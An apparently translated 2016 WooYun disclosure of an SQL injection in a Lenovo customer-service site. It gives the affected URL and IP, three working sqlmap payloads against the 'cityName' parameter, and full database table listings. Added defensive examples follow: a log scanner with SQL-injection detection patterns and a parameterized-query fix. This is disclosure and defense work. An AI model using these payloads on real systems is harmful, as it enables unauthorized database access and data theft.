Vulnerability summary

Defect ID: wooyun-2016-0167576

Title: SQL injection vulnerability on a Lenovo customer-service site

Vendor: 联想 (Lenovo)

Author: 乐乐

Submitted: 2016-01-06 10:47

Fixed: 2016-02-12 18:49

Published: 2016-02-12 18:49

Type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2016-01-06: Details sent to the vendor, awaiting vendor handling
2016-01-06: Vendor confirmed; details visible only to the vendor
2016-01-16: Details disclosed to core white hats and domain experts
2016-01-26: Details disclosed to regular white hats
2016-02-05: Details disclosed to intern white hats
2016-02-12: Details disclosed to the public

Brief description:

Detailed description:

Affected URL: http://123.127.225.173/getServiceStation.page?cityName=111
Web server: jetty
Database: mysql

[Screenshot: 联想sql注入.JPG]


Table dump details:
sqlmap identified the following injection point(s) with a total of 502 HTTP(s) requests:
---
Parameter: cityName (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: cityName=111'||(SELECT 'XPHI' FROM DUAL WHERE 5974=5974 RLIKE (SELECT (CASE WHEN (6870=6870) THEN 111 ELSE 0x28 END)))||'
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: cityName=111'||(SELECT 'ekXA' FROM DUAL WHERE 7609=7609 AND (SELECT 8743 FROM(SELECT COUNT(*),CONCAT(0x7178786b71,(SELECT (ELT(8743=8743,1))),0x7170767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a))||'
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: cityName=111'||(SELECT 'ibgW' FROM DUAL WHERE 4602=4602 AND (SELECT * FROM (SELECT(SLEEP(5)))xBeU))||'
---
back-end DBMS: MySQL 5.0
current user: '@'
Database: lenovo1
[168 tables]
+---------------------------------------+
| auth_address_restrict |
| auth_perm |
| auth_perm_cate |
| auth_perm_cate_to_perm |
| auth_role |
| auth_role_perm |
| auth_user |
| auth_user_role |
| dict_content |
| dict_name |
| kb_biz_tpl |
| kb_biz_tpl_attr |
| kb_biz_tpl_cat |
| kb_biz_tpl_cfg |
| kb_biz_tpl_cfg_attr |
| kb_biz_tpl_rdr |
| kb_cate_class |
| kb_category |
| kb_category_tag |
| kb_dim_val |
| kb_dim_val_tag |
| kb_faq |
| kb_faq_sample |
| kb_obj__obj |
| kb_obj_class |
| kb_object |
| kb_val |
| kb_wordclass |
| kb_wordclass_category |
| kb_wordclass_word |
| mat_app |
| mat_app_category |
| mat_img_mark |
| mat_material_idx |
| mat_material_tag |
| mat_material_tag_relate |
| mkt_advertise_item |
| mkt_advertise_suite |
| mkt_hot_question |
| mkt_notice |
| mkt_sign_activity |
| mkt_user_attribute |
| mkt_vote |
| mkt_vote_item |
| mkt_vote_record |
| om_feedback |
| om_instruction_rank_day |
| om_instruction_rank_month |
| om_leave_message |
| om_log_acs_detail_201501 |
| om_log_acs_detail_201503 |
| om_log_ask_detail_201501 |
| om_log_ask_detail_201503 |
| om_log_aud |
| om_log_bookmark |
| om_log_cache |
| om_log_faq_vote |
| om_log_imgtxt |
| om_log_nick_collect |
| om_log_service_detail_201501 |
| om_log_service_detail_201503 |
| om_log_session_201501 |
| om_log_session_201503 |
| om_log_system |
| om_log_user_login |
| om_report_template |
| om_unresolved_ques_day |
| om_unresolved_ques_month |
| pub_kb_attribute |
| pub_kb_attribute__attribute |
| pub_kb_baseword |
| pub_kb_cate_class |
| pub_kb_category |
| pub_kb_category_tag |
| pub_kb_class |
| pub_kb_cmchat_faq |
| pub_kb_dim |
| pub_kb_dim_tag |
| pub_kb_dim_val |
| pub_kb_dim_val_tag |
| pub_kb_faq |
| pub_kb_faq_sample |
| pub_kb_ignored_dyn_group |
| pub_kb_instruction |
| pub_kb_instruction_param |
| pub_kb_obj__obj |
| pub_kb_obj_class |
| pub_kb_object |
| pub_kb_participle |
| pub_kb_presuffix |
| pub_kb_rule |
| pub_kb_rule_sample |
| pub_kb_stopword |
| pub_kb_sysword_op |
| pub_kb_val |
| pub_kb_variable |
| pub_kb_wordclass |
| pub_kb_wordclass_category |
| pub_kb_wordclass_word |
| push_history_0 |
| push_history_1 |
| push_history_2 |
| push_history_3 |
| push_history_4 |
| push_history_5 |
| push_history_6 |
| push_history_7 |
| push_history_8 |
| push_history_9 |
| push_message |
| push_specified |
| ra_file |
| ra_file__object |
| ra_physical_file |
| rep_evaluation_day |
| rep_evaluation_hour |
| rep_evaluation_month |
| rep_faq_ranking_day |
| rep_faq_ranking_month |
| rep_logon_day |
| rep_survey_day |
| rep_survey_hour |
| rep_survey_month |
| rep_visit_hour |
| rep_visit_month |
| rm_blacklist |
| rm_emotion |
| rm_file_resource |
| rm_menuitem |
| rm_message_resource |
| rm_msgres_dimtag |
| rm_preference |
| rm_robot_account |
| rm_robot_friend_0 |
| rm_robot_friend_1 |
| rm_robot_friend_2 |
| rm_robot_friend_3 |
| rm_robot_friend_4 |
| rm_robot_friend_5 |
| rm_robot_friend_6 |
| rm_robot_friend_7 |
| rm_robot_friend_8 |
| rm_robot_friend_9 |
| rm_robot_friend_group |
| rm_robot_info |
| rm_simple_dialog |
| rm_welcome_resource |
| robot_cat |
| robotcat_knowledge |
| robotcat_result |
| rs_assist_word |
| rs_dict |
| rs_dict_item |
| rs_recog_result |
| rs_sample_category |
| rs_sample_item |
| rs_scenario |
| rs_scenario_tag |
| rs_sentence |
| rs_sentence_category |
| rs_voice_sample |
| rs_word |
| rs_wordclass_category |
| sys_notification |
| sys_temp_fbt |
| temp_word_import |
| view_push_history |
| view_robot_friend |
+---------------------------------------+
Database: robot
[332 tables]
+---------------------------------------+
| answer_info |
| article |
| article_log |
| auth_address_restrict |
| auth_perm |
| auth_perm_cate |
| auth_perm_cate_to_perm |
| auth_role |
| auth_role_perm |
| auth_user |
| auth_user_role |
| click_number |
| dict_content |
| dict_name |
| exp_acs_question |
| exp_acs_question_copy |
| exp_beauty_image |
| exp_channel_statistic |
| exp_countyesornorecord |
| exp_faq_qqhelp_count |
| exp_faq_vote_channel |
| exp_faq_vote_smarttv |
| exp_feedback |
| exp_flow_control |
| exp_flow_operate_mode |
| exp_funimage |
| exp_handsome_image |
| exp_hot_question_statistic |
| exp_joke |
| exp_joke_sex |
| exp_listenerthread |
| exp_logo_collection |
| exp_logo_collection_product |
| exp_logo_user_info |
| exp_poetry |
| exp_record_document |
| exp_record_login_user_click_no |
| exp_robot_logo |
| exp_solution |
| exp_solution_tool |
| exp_switch |
| exp_term |
| exp_term_statistic |
| exp_tool |
| exp_tools_info |
| exp_tools_info_1 |
| exp_tools_info_10 |
| exp_tools_statistic |
| exp_unsatisfy_statistic |
| exp_user_goout |
| exp_user_oper |
| exp_weibo_accesstoken |
| exp_zip_district_phonecode |
| faq_detail_tools |
| gongju_chajian |
| kb_biz_tpl |
| kb_biz_tpl_attr |
| kb_biz_tpl_cat |
| kb_biz_tpl_cfg |
| kb_biz_tpl_cfg_attr |
| kb_biz_tpl_rdr |
| kb_cate_class |
| kb_category |
| kb_category_tag |
| kb_dim_val |
| kb_dim_val_tag |
| kb_faq |
| kb_faq_sample |
| kb_obj__obj |
| kb_obj_class |
| kb_object |
| kb_val |
| kb_wordclass |
| kb_wordclass_category |
| kb_wordclass_word |
| login_user_info |
| login_user_info_copy |
| login_user_qa |
| mat_app |
| mat_app_category |
| mat_img_mark |
| mat_material_idx |
| mat_material_tag |
| mat_material_tag_relate |
| mkt_advertise_item |
| mkt_advertise_suite |
| mkt_hot_question |
| mkt_notice |
| mkt_sign_activity |
| mkt_user_attribute |
| mkt_vote |
| mkt_vote_item |
| mkt_vote_record |
| om_feedback |
| om_instruction_rank_day |
| om_instruction_rank_month |
| om_leave_message |
| om_log_acs_detail_201308 |
| om_log_acs_detail_201309 |
| om_log_acs_detail_201310 |
| om_log_acs_detail_201311 |
| om_log_acs_detail_201312 |
| om_log_acs_detail_201401 |
| om_log_acs_detail_201402 |
| om_log_acs_detail_201403 |
| om_log_acs_detail_201404 |
| om_log_acs_detail_201405 |
| om_log_acs_detail_201406 |
| om_log_acs_detail_201407 |
| om_log_acs_detail_201408 |
| om_log_acs_detail_201409 |
| om_log_acs_detail_201410 |
| om_log_acs_detail_201411 |
| om_log_acs_detail_201412 |
| om_log_acs_detail_201501 |
| om_log_acs_detail_201502 |
| om_log_acs_detail_201503 |
| om_log_acs_detail_201504 |
| om_log_acs_detail_201505 |
| om_log_acs_detail_201506 |
| om_log_acs_detail_201507 |
| om_log_acs_detail_201508 |
| om_log_acs_detail_201509 |
| om_log_acs_detail_201510 |
| om_log_acs_detail_201511 |
| om_log_acs_detail_201512 |
| om_log_acs_detail_201601 |
| om_log_ask_detail_201308 |
| om_log_ask_detail_201309 |
| om_log_ask_detail_201310 |
| om_log_ask_detail_201311 |
| om_log_ask_detail_201312 |
| om_log_ask_detail_201401 |
| om_log_ask_detail_201402 |
| om_log_ask_detail_201403 |
| om_log_ask_detail_201404 |
| om_log_ask_detail_201405 |
| om_log_ask_detail_201406 |
| om_log_ask_detail_201407 |
| om_log_ask_detail_201408 |
| om_log_ask_detail_201409 |
| om_log_ask_detail_201410 |
| om_log_ask_detail_201411 |
| om_log_ask_detail_201412 |
| om_log_ask_detail_201501 |
| om_log_ask_detail_201502 |
| om_log_ask_detail_201503 |
| om_log_ask_detail_201504 |
| om_log_ask_detail_201505 |
| om_log_ask_detail_201506 |
| om_log_ask_detail_201507 |
| om_log_ask_detail_201508 |
| om_log_ask_detail_201509 |
| om_log_ask_detail_201510 |
| om_log_ask_detail_201511 |
| om_log_ask_detail_201512 |
| om_log_ask_detail_201601 |
| om_log_aud |
| om_log_bookmark |
| om_log_cache |
| om_log_faq_vote |
| om_log_imgtxt |
| om_log_nick_collect |
| om_log_service_detail_201308 |
| om_log_service_detail_201309 |
| om_log_service_detail_201310 |
| om_log_service_detail_201311 |
| om_log_service_detail_201312 |
| om_log_service_detail_201401 |
| om_log_service_detail_201402 |
| om_log_service_detail_201403 |
| om_log_service_detail_201404 |
| om_log_service_detail_201405 |
| om_log_service_detail_201406 |
| om_log_service_detail_201407 |
| om_log_service_detail_201408 |
| om_log_service_detail_201409 |
| om_log_service_detail_201410 |
| om_log_service_detail_201411 |
| om_log_service_detail_201412 |
| om_log_service_detail_201501 |
| om_log_service_detail_201502 |
| om_log_service_detail_201503 |
| om_log_service_detail_201504 |
| om_log_service_detail_201505 |
| om_log_service_detail_201506 |
| om_log_service_detail_201507 |
| om_log_service_detail_201508 |
| om_log_service_detail_201509 |
| om_log_service_detail_201510 |
| om_log_service_detail_201511 |
| om_log_service_detail_201512 |
| om_log_service_detail_201601 |
| om_log_session_201308 |
| om_log_session_201309 |
| om_log_session_201310 |
| om_log_session_201311 |
| om_log_session_201312 |
| om_log_session_201401 |
| om_log_session_201402 |
| om_log_session_201403 |
| om_log_session_201404 |
| om_log_session_201405 |
| om_log_session_201406 |
| om_log_session_201407 |
| om_log_session_201408 |
| om_log_session_201409 |
| om_log_session_201410 |
| om_log_session_201411 |
| om_log_session_201412 |
| om_log_session_201501 |
| om_log_session_201502 |
| om_log_session_201503 |
| om_log_session_201504 |
| om_log_session_201505 |
| om_log_session_201506 |
| om_log_session_201507 |
| om_log_session_201508 |
| om_log_session_201509 |
| om_log_session_201510 |
| om_log_session_201511 |
| om_log_session_201512 |
| om_log_session_201601 |
| om_log_system |
| om_log_user_login |
| om_report_template |
| om_unresolved_ques_day |
| om_unresolved_ques_month |
| option_info |
| pub_kb_attribute |
| pub_kb_attribute__attribute |
| pub_kb_baseword |
| pub_kb_cate_class |
| pub_kb_category |
| pub_kb_category_tag |
| pub_kb_class |
| pub_kb_cmchat_faq |
| pub_kb_dim |
| pub_kb_dim_tag |
| pub_kb_dim_val |
| pub_kb_dim_val_tag |
| pub_kb_faq |
| pub_kb_faq_sample |
| pub_kb_ignored_dyn_group |
| pub_kb_instruction |
| pub_kb_instruction_param |
| pub_kb_obj__obj |
| pub_kb_obj_class |
| pub_kb_object |
| pub_kb_participle |
| pub_kb_presuffix |
| pub_kb_rule |
| pub_kb_rule_sample |
| pub_kb_stopword |
| pub_kb_sysword_op |
| pub_kb_val |
| pub_kb_wordclass |
| pub_kb_wordclass_category |
| pub_kb_wordclass_word |
| push_history_0 |
| push_history_1 |
| push_history_2 |
| push_history_3 |
| push_history_4 |
| push_history_5 |
| push_history_6 |
| push_history_7 |
| push_history_8 |
| push_history_9 |
| push_message |
| push_specified |
| question_info |
| questionnaire_info |
| questionnaire_user_info |
| ra_file |
| ra_file__object |
| ra_physical_file |
| rep_evaluation_day |
| rep_evaluation_hour |
| rep_evaluation_month |
| rep_faq_ranking_day |
| rep_faq_ranking_month |
| rep_logon_day |
| rep_survey_day |
| rep_survey_hour |
| rep_survey_month |
| rep_visit_hour |
| rep_visit_month |
| rm_blacklist |
| rm_emotion |
| rm_file_resource |
| rm_menuitem |
| rm_message_resource |
| rm_msgres_dimtag |
| rm_preference |
| rm_robot_account |
| rm_robot_friend_0 |
| rm_robot_friend_1 |
| rm_robot_friend_2 |
| rm_robot_friend_3 |
| rm_robot_friend_4 |
| rm_robot_friend_5 |
| rm_robot_friend_6 |
| rm_robot_friend_7 |
| rm_robot_friend_8 |
| rm_robot_friend_9 |
| rm_robot_friend_group |
| rm_robot_info |
| rm_simple_dialog |
| rm_welcome_resource |
| robot_cat |
| robotcat_knowledge |
| robotcat_result |
| rs_assist_word |
| rs_dict |
| rs_dict_item |
| rs_recog_result |
| rs_sample_category |
| rs_sample_item |
| rs_scenario |
| rs_scenario_tag |
| rs_sentence |
| rs_sentence_category |
| rs_voice_sample |
| rs_word |
| rs_wordclass_category |
| sys_notification |
| sys_temp_fbt |
| temp_word_import |
| tool_question_info |
| user_detail_info |
| view_robot_friend |
+---------------------------------------+
Database: information_schema
[28 tables]
+---------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| KEY_COLUMN_USAGE |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+---------------------------------------+
Database: mysql
[23 tables]
+---------------------------------------+
| user |
| columns_priv |
| db |
| event |
| func |
| general_log |
| help_category |
| help_keyword |
| help_relation |
| help_topic |
| host |
| ndb_binlog_index |
| plugin |
| proc |
| procs_priv |
| servers |
| slow_log |
| tables_priv |
| time_zone |
| time_zone_leap_second |
| time_zone_name |
| time_zone_transition |
| time_zone_transition_type |
+---------------------------------------+
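The three sqlmap payloads above are exactly the kind of request a web-server access log records, so a defender's first question is whether these probes are visible after the fact. The following is an added example, not part of the original report: it rebuilds NCSA-style access-log lines for the report's endpoint (path and parameter name taken from the report; the client IPs, timestamps and the assumption that Jetty's request log is in NCSA common format are constructed for the example), URL-decodes each query parameter and flags values that look like SQL probing. The indicators are tuned to what the report shows: a quote immediately followed by an SQL operator, a subselect, an `information_schema` reference, `SLEEP(`/`BENCHMARK(` and `RLIKE`.

```python
import re
from urllib.parse import parse_qs, quote_plus, urlsplit

# --- Constructed sample data -------------------------------------------------
# The report's three cityName payloads (copied from the sqlmap output) plus two
# benign values. IPs and timestamps are made up; the log format is NCSA common
# format, assumed here to be what this site's Jetty request log writes.
REPORT_PAYLOADS = [
    "111'||(SELECT 'XPHI' FROM DUAL WHERE 5974=5974 RLIKE (SELECT (CASE WHEN (6870=6870) THEN 111 ELSE 0x28 END)))||'",
    "111'||(SELECT 'ekXA' FROM DUAL WHERE 7609=7609 AND (SELECT 8743 FROM(SELECT COUNT(*),CONCAT(0x7178786b71,(SELECT (ELT(8743=8743,1))),0x7170767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a))||'",
    "111'||(SELECT 'ibgW' FROM DUAL WHERE 4602=4602 AND (SELECT * FROM (SELECT(SLEEP(5)))xBeU))||'",
]

def _ncsa_line(ip, ts, city):
    """Build one access-log line for a GET to the report's endpoint."""
    return f'{ip} - - [{ts}] "GET /getServiceStation.page?cityName={quote_plus(city)} HTTP/1.1" 200 4096'

SAMPLE_LOG = "\n".join([
    _ncsa_line("203.0.113.5", "06/Jan/2016:10:40:01 +0800", "北京"),
    _ncsa_line("203.0.113.5", "06/Jan/2016:10:40:02 +0800", "111"),
    _ncsa_line("198.51.100.9", "06/Jan/2016:10:41:10 +0800", REPORT_PAYLOADS[0]),
    _ncsa_line("198.51.100.9", "06/Jan/2016:10:41:11 +0800", REPORT_PAYLOADS[1]),
    _ncsa_line("198.51.100.9", "06/Jan/2016:10:41:12 +0800", REPORT_PAYLOADS[2]),
])

# --- Detection ---------------------------------------------------------------
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) (\S+)" (\d{3}) (\S+)$')

# Each indicator is checked against the *decoded* parameter value. A lone
# apostrophe is not flagged (a city such as Xi'an is legitimate); what is
# flagged is a quote immediately followed by an SQL operator or comment.
INDICATORS = [
    ("quote-operator", re.compile(r"'\s*(\|\||&&|\bor\b|\band\b|--|#|;)", re.I).search),
    ("time-based",     re.compile(r"\b(sleep|benchmark)\s*\(", re.I).search),
    ("schema-probe",   re.compile(r"information_schema", re.I).search),
    ("subselect",      re.compile(r"\bselect\b.+\bfrom\b", re.I).search),
    ("regex-compare",  re.compile(r"\brlike\b", re.I).search),
]

def scan_access_log(text):
    """Return one finding per query-parameter value that trips an indicator."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                      # skip lines in an unexpected format
        ip, ts, _method, target, _proto, _status, _size = m.groups()
        parts = urlsplit(target)
        params = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes values
        for name, values in params.items():
            for value in values:
                hits = [label for label, check in INDICATORS if check(value)]
                if hits:
                    findings.append({"ip": ip, "time": ts, "path": parts.path,
                                     "param": name, "indicators": hits})
    return findings

def suspicious_sources(findings, threshold=1):
    """Count findings per client IP; return sources at or above the threshold."""
    counts = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return {ip: n for ip, n in counts.items() if n >= threshold}

if __name__ == "__main__":
    found = scan_access_log(SAMPLE_LOG)
    for f in found:
        print(f["time"], f["ip"], f["path"], f["param"], ",".join(f["indicators"]))
    print(suspicious_sources(found))
```

Decoding before matching matters: the report's payloads arrive percent-encoded, so a pattern applied to the raw request line would miss `%27%7C%7C`. A single hit on one request is weak evidence; the per-source count is what distinguishes a scanner working through hundreds of payloads (the report mentions 502 requests) from a stray apostrophe in a real search term.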

Proof of vulnerability:

[Screenshot: 联想sql注入.JPG], followed by the same sqlmap output as in the detailed description above.

Fix recommendation:

Filter the input.
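The root cause described in the report, and the fix that the one-word recommendation above points at, side by side. This is an added example and not the site's code: sqlite3 stands in for the MySQL backend so the block runs offline, the `service_station` table and its rows are constructed, and the tautology payload used for the comparison is the textbook `' OR '1'='1`, not one of the report's sqlmap payloads. The lookup takes the same `cityName` value the affected URL does.

```python
import re
import sqlite3

# Constructed stand-in for the site's station table (table and column names are
# assumptions; sqlite3 replaces MySQL only so the example runs offline).
SAMPLE_STATIONS = [
    ("北京", "Beijing Haidian service station"),
    ("上海", "Shanghai Pudong service station"),
    ("广州", "Guangzhou Tianhe service station"),
]

def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE service_station (city TEXT NOT NULL, name TEXT NOT NULL)")
    conn.executemany("INSERT INTO service_station VALUES (?, ?)", SAMPLE_STATIONS)
    return conn

def lookup_unsafe(conn, city_name):
    # The defect class the report describes: the request parameter is pasted
    # into the SQL text, so a quote in cityName changes the query's structure.
    sql = f"SELECT name FROM service_station WHERE city = '{city_name}'"
    return [row[0] for row in conn.execute(sql)]

def lookup_safe(conn, city_name):
    # Bound parameter: the value travels separately from the SQL text and can
    # only ever be compared as a city name. On a Jetty/JDBC stack the
    # equivalent is PreparedStatement with setString().
    sql = "SELECT name FROM service_station WHERE city = ?"
    return [row[0] for row in conn.execute(sql, (city_name,))]

# Allowlist for the "filter" part of the fix: word characters (which in Python's
# Unicode regexes include CJK ideographs), spaces and hyphens, at most 50 chars.
# This is defence in depth on top of parameterization, not a replacement for it.
CITY_NAME_RE = re.compile(r"^\w[\w \-]{0,49}$")

def is_valid_city_name(value):
    return bool(CITY_NAME_RE.match(value))

def demo():
    """Run the same tautology payload through both lookups and the validator."""
    conn = make_db()
    payload = "x' OR '1'='1"        # classic tautology, constructed for the demo
    return {
        "unsafe_rows": len(lookup_unsafe(conn, payload)),   # every station leaks
        "safe_rows": len(lookup_safe(conn, payload)),       # no city is literally named that
        "valid_payload": is_valid_city_name(payload),       # rejected at the edge
        "valid_city": is_valid_city_name("北京"),
    }

if __name__ == "__main__":
    print(demo())
```

The parameterized lookup is the actual fix: it removes the string-to-SQL boundary that sqlmap exploited, regardless of what characters the value contains. The allowlist is worth adding in front of it because it also stops the probing traffic from reaching the database at all, which keeps the time-based `SLEEP(5)` payloads from tying up a connection.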

Copyright notice: when reposting, please credit the source 乐乐@乌云


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2016-01-06 11:28

Vendor reply:

Thank you for your attention to Lenovo's security!

Latest status:

None yet

